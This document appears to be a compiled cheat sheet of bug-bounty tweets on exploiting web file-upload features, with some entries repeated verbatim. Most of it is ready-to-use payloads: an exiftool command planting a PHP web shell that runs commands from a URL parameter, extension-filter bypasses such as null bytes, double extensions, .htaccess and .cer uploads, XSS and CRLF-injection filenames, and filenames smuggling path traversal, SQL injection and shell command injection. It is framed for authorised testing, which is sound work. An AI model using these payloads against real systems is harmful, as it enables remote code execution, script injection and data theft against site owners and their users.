File Upload

• #BugBountyProTip Some caching servers would cache files larger than 2mb. if app accepts file upload, then upload a large file and access it #multiple times while logged-in. It will be cached. Then access it without login, and pingo! unauthenticated access to sensitive files!

• Uploader Vuln: Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx" Content-Type: image/jpeg Res: {"StoreHousePicture_File":"test.aspx","Success":true}#BugBounty

• https://anotherhackerblog.com/exploiting-file-uploads-pt1/

• https://anotherhackerblog.com/exploiting-file-uploads-pt-2/

• Payloads - https://github.com/1N3/IntruderPayloads/tree/master/Uploads

• Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #BugBounty

• Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips

• Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.

• #BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png

• Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #BugBounty

• #BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png

• Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips

• #Bugbountytip Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.

• bypassing file content restrictions: in some cases you can do a crlf injection via filename x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script> this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip

• RT@CyberSecurityN8: RT@infosecsanyam: RT@th3cyb3rc0p: RT@M404ntf: If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec

Chaining file uploads with other vulns:-

Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.